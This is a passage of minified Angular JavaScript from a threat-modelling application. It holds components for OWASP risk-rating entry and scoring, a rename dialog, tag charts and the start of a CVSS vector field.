be(e),Me(B().entry.FD=n)}),s(100,"\n          "),ne(101,o9e,3,4,"mat-option",6),s(102,"\n        "),u(),s(103,"\n        "),m(104,"mat-icon",7),oe(105,"translate"),s(106,"info"),u(),s(107,"\n      "),u(),s(108,"\n    "),u(),s(109,"\n  "),u(),s(110,"\n  "),m(111,"tr"),s(112,"\n    "),m(113,"td"),s(114,"\n      "),m(115,"mat-form-field",4),s(116,"\n        "),m(117,"mat-label"),s(118),oe(119,"translate"),u(),s(120,"\n        "),m(121,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.M=n)}),s(122,"\n          "),ne(123,r9e,3,4,"mat-option",6),s(124,"\n        "),u(),s(125,"\n        "),m(126,"mat-icon",7),oe(127,"translate"),s(128,"info"),u(),s(129,"\n      "),u(),s(130,"\n    "),u(),s(131,"\n    "),m(132,"td"),s(133,"\n      "),m(134,"mat-form-field",4),s(135,"\n        "),m(136,"mat-label"),s(137),oe(138,"translate"),u(),s(139,"\n        "),m(140,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.EE=n)}),s(141,"\n          "),ne(142,s9e,3,4,"mat-option",6),s(143,"\n        "),u(),s(144,"\n        "),m(145,"mat-icon",7),oe(146,"translate"),s(147,"info"),u(),s(148,"\n      "),u(),s(149,"\n    "),u(),s(150,"\n    "),m(151,"td"),s(152,"\n      "),m(153,"mat-form-field",4),s(154,"\n        "),m(155,"mat-label"),s(156),oe(157,"translate"),u(),s(158,"\n        "),m(159,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.LI=n)}),s(160,"\n          "),ne(161,c9e,3,4,"mat-option",6),s(162,"\n        "),u(),s(163,"\n        "),m(164,"mat-icon",7),oe(165,"translate"),s(166,"info"),u(),s(167,"\n      "),u(),s(168,"\n    "),u(),s(169,"\n    "),m(170,"td"),s(171,"\n      "),m(172,"mat-form-field",4),s(173,"\n        "),m(174,"mat-label"),s(175),oe(176,"translate"),u(),s(177,"\n        "),m(178,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.RD=n)}),s(179,"\n          "),ne(180,l9e,3,4,"mat-option",6),s(181,"\n        "),u(),s(182,"\n        "),m(183,"mat-icon",7),oe(184,"translate"),s(185,"info"),u(),s(186,"\n      "),u(),s(187,"\n    "),u(),s(188,"\n  "),u(),s(189,"\n  "),m(190,"tr"),s(191,"\n    "),m(192,"td"),s(193,"\n      "),m(194,"mat-form-field",4),s(195,"\n        "),m(196,"mat-label"),s(197),oe(198,"translate"),u(),s(199,"\n        "),m(200,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.O=n)}),s(201,"\n          "),ne(202,d9e,3,4,"mat-option",6),s(203,"\n        "),u(),s(204,"\n        "),m(205,"mat-icon",7),oe(206,"translate"),s(207,"info"),u(),s(208,"\n      "),u(),s(209,"\n    "),u(),s(210,"\n    "),m(211,"td"),s(212,"\n      "),m(213,"mat-form-field",4),s(214,"\n        "),m(215,"mat-label"),s(216),oe(217,"translate"),u(),s(218,"\n        "),m(219,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.A=n)}),s(220,"\n          "),ne(221,m9e,3,4,"mat-option",6),s(222,"\n        "),u(),s(223,"\n        "),m(224,"mat-icon",7),oe(225,"translate"),s(226,"info"),u(),s(227,"\n      "),u(),s(228,"\n    "),u(),s(229,"\n    "),m(230,"td"),s(231,"\n      "),m(232,"mat-form-field",4),s(233,"\n        "),m(234,"mat-label"),s(235),oe(236,"translate"),u(),s(237,"\n        "),m(238,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.LAV=n)}),s(239,"\n          "),ne(240,u9e,3,4,"mat-option",6),s(241,"\n        "),u(),s(242,"\n        "),m(243,"mat-icon",7),oe(244,"translate"),s(245,"info"),u(),s(246,"\n      "),u(),s(247,"\n    "),u(),s(248,"\n    "),m(249,"td"),s(250,"\n      "),m(251,"mat-form-field",4),s(252,"\n        "),m(253,"mat-label"),s(254),oe(255,"translate"),u(),s(256,"\n        "),m(257,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.NC=n)}),s(258,"\n          "),ne(259,h9e,3,4,"mat-option",6),s(260,"\n        "),u(),s(261,"\n        "),m(262,"mat-icon",7),oe(263,"translate"),s(264,"info"),u(),s(265,"\n      "),u(),s(266,"\n    "),u(),s(267,"\n  "),u(),s(268,"\n  "),m(269,"tr"),s(270,"\n    "),m(271,"td"),s(272,"\n      "),m(273,"mat-form-field",4),s(274,"\n        "),m(275,"mat-label"),s(276),oe(277,"translate"),u(),s(278,"\n        "),m(279,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.S=n)}),s(280,"\n          "),ne(281,f9e,3,4,"mat-option",6),s(282,"\n        "),u(),s(283,"\n        "),m(284,"mat-icon",7),oe(285,"translate"),s(286,"info"),u(),s(287,"\n      "),u(),s(288,"\n    "),u(),s(289,"\n    "),m(290,"td"),s(291,"\n      "),m(292,"mat-form-field",4),s(293,"\n        "),m(294,"mat-label"),s(295),oe(296,"translate"),u(),s(297,"\n        "),m(298,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.ID=n)}),s(299,"\n          "),ne(300,p9e,3,4,"mat-option",6),s(301,"\n        "),u(),s(302,"\n        "),m(303,"mat-icon",7),oe(304,"translate"),s(305,"info"),u(),s(306,"\n      "),u(),s(307,"\n    "),u(),s(308,"\n    "),m(309,"td"),s(310,"\n      "),m(311,"mat-form-field",4),s(312,"\n        "),m(313,"mat-label"),s(314),oe(315,"translate"),u(),s(316,"\n        "),m(317,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.LAC=n)}),s(318,"\n          "),ne(319,_9e,3,4,"mat-option",6),s(320,"\n        "),u(),s(321,"\n        "),m(322,"mat-icon",7),oe(323,"translate"),s(324,"info"),u(),s(325,"\n      "),u(),s(326,"\n    "),u(),s(327,"\n    "),m(328,"td"),s(329,"\n      "),m(330,"mat-form-field",4),s(331,"\n        "),m(332,"mat-label"),s(333),oe(334,"translate"),u(),s(335,"\n        "),m(336,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.PV=n)}),s(337,"\n          "),ne(338,g9e,3,4,"mat-option",6),s(339,"\n        "),u(),s(340,"\n        "),m(341,"mat-icon",7),oe(342,"translate"),s(343,"info"),u(),s(344,"\n      "),u(),s(345,"\n    "),u(),s(346,"\n  "),u(),s(347,"\n  "),m(348,"tr"),s(349,"\n    "),m(350,"td")(351,"h3"),s(352,"Threat Agent Factor:"),it(353,"br"),s(354),u()(),s(355,"\n    "),m(356,"td")(357,"h3"),s(358,"Vulnerability Factor:"),it(359,"br"),s(360),u()(),s(361,"\n    "),m(362,"td")(363,"h3"),s(364,"Technical Impact Factor:"),it(365,"br"),s(366),u()(),s(367,"\n    "),m(368,"td")(369,"h3"),s(370,"Business Impact Factor:"),it(371,"br"),s(372),u()(),s(373,"\n  "),u(),s(374,"\n  "),m(375,"tr"),s(376,"\n    "),m(377,"td",1)(378,"h3",2),s(379),u()(),s(380,"\n    "),m(381,"td",1)(382,"h3",2),s(383),u()(),s(384,"\n  "),u(),s(385,"\n  "),m(386,"tr"),s(387,"\n    "),m(388,"td",8)(389,"h3"),s(390),u()(),s(391,"\n  "),u(),s(392,"\n  "),m(393,"tr"),s(394,"\n    "),m(395,"td",8),s(396,"Score Vector: "),m(397,"a",9),s(398),u()(),s(399,"\n  "),u(),s(400,"\n"),u()}if(2&t){const e=B();C(39),ke(re(40,73,"shared.owasprr.sl")),C(3),V("value",e.entry.SL),C(2),V("ngForOf",kr(137,C9e)),C(3),at("matTooltip",re(48,75,"shared.owasprr.sl.tt")),C(11),ke(re(59,77,"shared.owasprr.ed")),C(3),V("value",e.entry.ED),C(2),V("ngForOf",kr(138,BG)),C(3),at("matTooltip",re(67,79,"shared.owasprr.ed.tt")),C(11),ke(re(78,81,"shared.owasprr.lc")),C(3),V("value",e.entry.LC),C(2),V("ngForOf",kr(139,y9e)),C(3),at("matTooltip",re(86,83,"shared.owasprr.lc.tt")),C(11),ke(re(97,85,"shared.owasprr.fd")),C(3),V("value",e.entry.FD),C(2),V("ngForOf",kr(140,BG)),C(3),at("matTooltip",re(105,87,"shared.owasprr.fd.tt")),C(14),ke(re(119,89,"shared.owasprr.m")),C(3),V("value",e.entry.M),C(2),V("ngForOf",kr(141,b9e)),C(3),at("matTooltip",re(127,91,"shared.owasprr.m.tt")),C(11),ke(re(138,93,"shared.owasprr.ee")),C(3),V("value",e.entry.EE),C(2),V("ngForOf",kr(142,M9e)),C(3),at("matTooltip",re(146,95,"shared.owasprr.ee.tt")),C(11),ke(re(157,97,"shared.owasprr.li")),C(3),V("value",e.entry.LI),C(2),V("ngForOf",kr(143,v9e)),C(3),at("matTooltip",re(165,99,"shared.owasprr.li.tt")),C(11),ke(re(176,101,"shared.owasprr.rd")),C(3),V("value",e.entry.RD),C(2),V("ngForOf",kr(144,A9e)),C(3),at("matTooltip",re(184,103,"shared.owasprr.rd.tt")),C(14),ke(re(198,105,"shared.owasprr.o")),C(3),V("value",e.entry.O),C(2),V("ngForOf",kr(145,T9e)),C(3),at("matTooltip",re(206,107,"shared.owasprr.o.tt")),C(11),ke(re(217,109,"shared.owasprr.a")),C(3),V("value",e.entry.A),C(2),V("ngForOf",kr(146,E9e)),C(3),at("matTooltip",re(225,111,"shared.owasprr.a.tt")),C(11),ke(re(236,113,"shared.owasprr.lav")),C(3),V("value",e.entry.LAV),C(2),V("ngForOf",kr(147,D9e)),C(3),at("matTooltip",re(244,115,"shared.owasprr.lav.tt")),C(11),ke(re(255,117,"shared.owasprr.nc")),C(3),V("value",e.entry.NC),C(2),V("ngForOf",kr(148,x9e)),C(3),at("matTooltip",re(263,119,"shared.owasprr.nc.tt")),C(14),ke(re(277,121,"shared.owasprr.s")),C(3),V("value",e.entry.S),C(2),V("ngForOf",kr(149,w9e)),C(3),at("matTooltip",re(285,123,"shared.owasprr.s.tt")),C(11),ke(re(296,125,"shared.owasprr.id")),C(3),V("value",e.entry.ID),C(2),V("ngForOf",kr(150,I9e)),C(3),at("matTooltip",re(304,127,"shared.owasprr.id.tt")),C(11),ke(re(315,129,"shared.owasprr.lac")),C(3),V("value",e.entry.LAC),C(2),V("ngForOf",kr(151,R9e)),C(3),at("matTooltip",re(323,131,"shared.owasprr.lac.tt")),C(11),ke(re(334,133,"shared.owasprr.pv")),C(3),V("value",e.entry.PV),C(2),V("ngForOf",kr(152,S9e)),C(3),at("matTooltip",re(342,135,"shared.owasprr.pv.tt")),C(13),ke(e.GetLabelThreatAgent()),C(6),ke(e.GetLabelVulnerability()),C(6),ke(e.GetLabelTechnicalImpact()),C(6),ke(e.GetLabelBusinessImpact()),C(7),ct("Likelihood Factor: ",e.GetLabelLikelihood(),""),C(4),ct("Impact Factor: ",e.GetLabelImpact(),""),C(7),ct("Overall Risk Severity: ",e.GetLabelOverallRisk(),""),C(7),at("href",e.GetURL(),nm),C(1),ke(e.GetVector())}}let IT=(()=>{class t{constructor(e,i,n){this.data=e,this.dataService=i,this.translate=n,e&&(this.entry=e.Value)}ngOnInit(){this.GetLabelOverallRisk()}OpenCalculator(){this.GetVector()&&window.open(this.GetURL(),"_blank")}GetFactorThreatAgent(){return this.getFactor([this.entry.SL,this.entry.M,this.entry.O,this.entry.S])}GetFactorVulnerability(){return this.getFactor([this.entry.ED,this.entry.EE,this.entry.A,this.entry.ID])}GetFactorTechnicalImpact(){return this.getFactor([this.entry.LC,this.entry.LI,this.entry.LAV,this.entry.LAC])}GetFactorBusinessImpact(){return this.getFactor([this.entry.FD,this.entry.RD,this.entry.NC,this.entry.PV])}GetFactorLikelihood(){return this.getFactor([this.GetFactorThreatAgent(),this.GetFactorVulnerability()])}GetFactorImpact(){return this.getFactor([this.GetFactorTechnicalImpact(),this.GetFactorBusinessImpact()])}GetLabelThreatAgent(){return this.getFactorCategoryString(this.GetFactorThreatAgent())}GetLabelVulnerability(){return this.getFactorCategoryString(this.GetFactorVulnerability())}GetLabelTechnicalImpact(){return this.getFactorCategoryString(this.GetFactorTechnicalImpact())}GetLabelBusinessImpact(){return this.getFactorCategoryString(this.GetFactorBusinessImpact())}GetLabelLikelihood(){return this.getFactorCategoryString(this.GetFactorLikelihood())}GetLabelImpact(){return this.getFactorCategoryString(this.GetFactorImpact())}GetLabelOverallRisk(){const e=[this.getFactorCategory(this.GetFactorImpact()),this.getFactorCategory(this.GetFactorLikelihood())];let i=cn.None;return e.every(n=>n==lr.High)?i=cn.Critical:e.some(n=>n==lr.High)&&e.some(n=>n==lr.Medium)?i=cn.High:e.every(n=>n==lr.Medium)||e.some(n=>n==lr.High)?i=cn.Medium:e.some(n=>n==lr.Medium)&&(i=cn.Low),i!=this.entry.Score&&setTimeout(()=>{this.entry.Impact=this.getFactorCategory(this.GetFactorImpact()),this.entry.Likelihood=this.getFactorCategory(this.GetFactorLikelihood()),this.entry.Score=i},10),this.translate.instant(vn.ToString(i))}getFactor(e){let i=0;return e.filter(n=>n).forEach(n=>i+=n),i/e.length}getFactorCategory(e){let i=lr.Low;return e>=3&&e<6?i=lr.Medium:e>=6&&(i=lr.High),i}getFactorCategoryString(e){return 0==e?"":this.translate.instant(An.ToString(this.getFactorCategory(e)))+" ("+e.toFixed(2)+")"}GetURL(){return t.GetURL(this.entry)}GetVector(){return t.GetVector(this.entry)}static GetURL(e){let i=t.GetVector(e);return i?"https://owasp-risk-rating.com/?vector=("+i+")":null}static GetVector(e){if(e){let i="";return Object.keys(e).forEach(n=>{e[n]&&n.length<=3&&(i+="/"+n+":"+e[n])}),i}return null}}return t.\u0275fac=function(e){return new(e||t)(Ee(P5,8),Ee(Yi),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-owasp-rr-entry"]],inputs:{entry:"entry"},decls:1,vars:1,consts:[[4,"ngIf"],["colspan","2"],[2,"margin","0"],[2,"width","25%"],["appearance","fill",1,"property-form-field"],[3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],["matSuffix","","matTooltipShowDelay","1000",3,"matTooltip"],["colspan","4"],["target","_blank",3,"href"],[3,"value"]],template:function(e,i){1&e&&ne(0,k9e,401,153,"table",0),2&e&&V("ngIf",null!=i.entry)},dependencies:[Zi,Ri,oa,nn,un,jr,Nr,yr,Pa,Xi],styles:[".primary-color[_ngcontent-%COMP%], a[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}"]}),t})();function P9e(t,a){if(1&t){const e=Ye();m(0,"button",6),he("click",function(){return be(e),Me(B().Value="")}),s(1,"\n      "),m(2,"mat-icon"),s(3,"close"),u(),s(4,"\n    "),u()}}let O9e=(()=>{class t{constructor(e,i){this.dialogRef=e,this.data=i}get Value(){return this.data.Object.GetProperty(this.data.Property.ID)}set Value(e){this.data.Object.SetProperty(this.data.Property.ID,e)}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(gp))},t.\u0275cmp=Wt({type:t,selectors:[["app-rename-dialog"]],decls:20,vars:9,consts:[["mat-dialog-title",""],["appearance","fill",1,"example-form-field"],["matInput","","type","text",3,"ngModel","ngModelChange"],["matSuffix","","mat-icon-button","",3,"click",4,"ngIf"],["align","end"],["mat-button","","cdkFocusInitial","",3,"mat-dialog-close"],["matSuffix","","mat-icon-button","",3,"click"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n  "),m(6,"mat-form-field",1),s(7,"\n    "),m(8,"input",2),he("ngModelChange",function(r){return i.Value=r}),u(),s(9,"\n    "),ne(10,P9e,5,0,"button",3),s(11,"\n  "),u(),s(12,"\n"),u(),s(13,"\n"),m(14,"mat-dialog-actions",4),s(15,"\n  "),m(16,"button",5),s(17),oe(18,"translate"),u(),s(19,"\n"),u()),2&e&&(C(1),ke(re(2,5,"dialog.rename.title")),C(7),V("ngModel",i.Value),C(2),V("ngIf",i.Value),C(6),V("mat-dialog-close",!0),C(1),ke(re(18,7,"general.Close")))},dependencies:[Ri,an,Ta,Ea,oa,da,nn,jr,Xa,vm,Am,Tm,Em,Xi]}),t})();function N9e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",8),he("click",function(){const r=be(e).$implicit;return Me(B().selectedChart=r)}),s(1,"\n        "),m(2,"mat-icon",9),s(3,"arrow_right"),u(),s(4,"\n        "),m(5,"div",10),s(6),oe(7,"translate"),u(),s(8,"\n        "),m(9,"button",11),he("click",function(){const r=be(e).$implicit;return Me(B().DeleteChart(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"delete"),u()(),s(13,"\n      "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.selectedChart===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedChart===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(re(7,7,e.Name)),C(3),at("matTooltip",re(10,9,"general.Delete"))}}function L9e(t,a){if(1&t&&(m(0,"mat-option",23),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetTypeName(e)))}}function z9e(t,a){if(1&t){const e=Ye();m(0,"button",24),he("click",function(){const r=be(e).$implicit;return Me(B(2).AddTagToChart(r))}),m(1,"mat-icon",25),s(2,"circle"),u(),s(3),u()}if(2&t){const e=a.$implicit;C(1),ri("color",e.Color),C(2),ct(" ",e.Name,"")}}function W9e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",26),s(1,"\n          "),m(2,"mat-icon",9),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",10),s(6),oe(7,"translate"),u(),s(8,"\n          "),m(9,"button",11),he("click",function(){const r=be(e).$implicit;return Me(B(2).RemoveTag(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"remove"),u()(),s(13,"\n        "),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(6),ke(re(7,3,e.Name)),C(3),at("matTooltip",re(10,5,"general.Remove"))}}function F9e(t,a){if(1&t){const e=Ye();m(0,"div",12),s(1,"\n      "),m(2,"mat-form-field",13),s(3,"\n        "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"input",14),he("ngModelChange",function(n){return be(e),Me(B().selectedChart.Name=n)}),u(),s(9,"\n      "),u(),s(10,"\n      "),m(11,"mat-form-field",15),s(12,"\n        "),m(13,"mat-select",16),he("ngModelChange",function(n){return be(e),Me(B().selectedChart.Type=n)}),s(14,"\n          "),ne(15,L9e,3,4,"mat-option",17),s(16,"\n        "),u(),s(17,"\n      "),u(),s(18,"\n      "),m(19,"mat-list",18),he("cdkDropListDropped",function(n){return be(e),Me(B().dropTag(n))}),s(20,"\n        "),m(21,"div",3),s(22),oe(23,"translate"),m(24,"button",19),oe(25,"translate"),m(26,"mat-icon"),s(27,"add"),u()(),s(28,"\n          "),m(29,"mat-menu",null,20),s(31,"\n            "),ne(32,z9e,4,3,"button",21),s(33,"\n          "),u(),s(34,"\n        "),u(),s(35,"\n        "),ne(36,W9e,14,7,"mat-list-item",22),s(37,"\n      "),u(),s(38,"\n    "),u()}if(2&t){const e=Ti(30),i=B();C(5),ke(re(6,15,"properties.Name")),C(3),at("matTooltip",i.selectedChart.Name),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.selectedChart.Name),C(5),V("ngModel",i.selectedChart.Type),C(2),V("ngForOf",i.GetTypes()),C(4),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(3),ct("",re(23,17,"general.Tags")," \n          "),C(2),at("matTooltip",re(25,19,"general.Add")),V("matMenuTriggerFor",e),C(8),V("ngForOf",i.GetPossibleTags()),C(4),V("ngForOf",i.selectedChart.MyTags)}}let V9e=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.dialog=n}get charts(){return this.dataService.Project.GetMyTagCharts()}ngOnInit(){}AddChart(){this.selectedChart=this.dataService.Project.CreateMyTagChart()}DeleteChart(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(e==this.selectedChart&&(this.selectedChart=null),this.dataService.Project.DeleteMyTagChart(e))})}AddTagToChart(e){this.selectedChart.AddMyTag(e)}RemoveTag(e){this.selectedChart.RemoveMyTag(e.ID)}GetPossibleTags(){return this.dataService.Project.GetMyTags().filter(e=>!this.selectedChart.MyTags.includes(e))}dropChart(e){Qs(this.dataService.Project.GetMyTagCharts(),e.previousIndex,e.currentIndex)}dropTag(e){Qs(this.selectedChart.Data.myTagIDs,e.previousIndex,e.currentIndex)}GetTypes(){return LG.GetKeys()}GetTypeName(e){return LG.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-tag-charts"]],decls:24,vars:12,consts:[[1,"row",2,"margin-bottom","10px"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],["appearance","fill",1,"property-form-field"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],[1,"property-form-field"],[3,"ngModel","ngModelChange"],[3,"value",4,"ngFor","ngForOf"],["cdkDropList","",1,"prop-list","reorder-list","property-form-field",3,"cdkDropListDropped"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip",4,"ngFor","ngForOf"],[3,"value"],["mat-menu-item","",3,"click"],[2,"margin-right","5px"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"mat-list",2),he("cdkDropListDropped",function(r){return i.dropChart(r)}),s(5,"\n      "),m(6,"div",3),s(7),oe(8,"translate"),m(9,"button",4),he("click",function(){return i.AddChart()}),oe(10,"translate"),m(11,"mat-icon"),s(12,"add"),u()(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,N9e,14,11,"mat-list-item",5),s(16,"\n    "),u(),s(17,"\n  "),u(),s(18,"\n  "),m(19,"div",6),s(20,"\n    "),ne(21,F9e,39,21,"div",7),s(22,"\n  "),u(),s(23,"\n"),u()),2&e&&(C(4),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(3),ct("",re(8,8,"dialog.tagcharts.Charts")," \n        "),C(2),at("matTooltip",re(10,10,"general.Add")),C(6),V("ngForOf",i.charts),C(6),V("ngIf",i.selectedChart))},dependencies:[Zi,Ri,an,Ta,Ea,Rd,Sd,oa,da,nn,un,Nr,yr,Xa,es,ts,Or,Lr,rc,Xo,qo,po,Pa,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.property-form-field[_ngcontent-%COMP%]{width:300px}']}),t})();function B9e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",9),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),it(8,"input",10),s(9,"\n    "),u(),s(10,"\n    "),m(11,"mat-form-field",11),s(12,"\n      "),m(13,"mat-label"),s(14),oe(15,"translate"),u(),s(16,"\n      "),it(17,"input",12),s(18,"\n    "),u(),s(19,"\n    "),m(20,"mat-form-field",11),s(21,"\n      "),m(22,"mat-label"),s(23),oe(24,"translate"),u(),s(25,"\n      "),it(26,"input",12),oe(27,"translate"),s(28,"\n    "),u(),s(29,"\n    "),m(30,"button",4),he("click",function(){const r=be(e).$implicit;return Me(B(2).OpenCVSS(r))}),oe(31,"translate"),s(32,"\n      "),m(33,"mat-icon"),s(34,"open_in_new"),u(),s(35,"\n    "),u(),s(36,"\n    "),it(37,"br"),s(38,"\n  "),Mt()}if(2&t){const e=a.$implicit,i=B(2);C(5),za("",re(6,8,"shared.cvss.name.s")," ",e.Version,""),C(3),V("ngModel",e.Score),C(6),ke(re(15,10,"report.CvssVector")),C(3),V("ngModel",i.GetVector(e)),C(6),ke(re(24,12,"properties.Severity")),C(3),V("ngModel",re(27,14,i.GetSeverity(e.Score))),C(4),at("matTooltip",re(31,16,"general.openInNew"))}}function H9e(t,a){if(1&t&&(m(0,"mat-accordion",13),s(1,"\n    "),m(2,"mat-expansion-panel",14),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        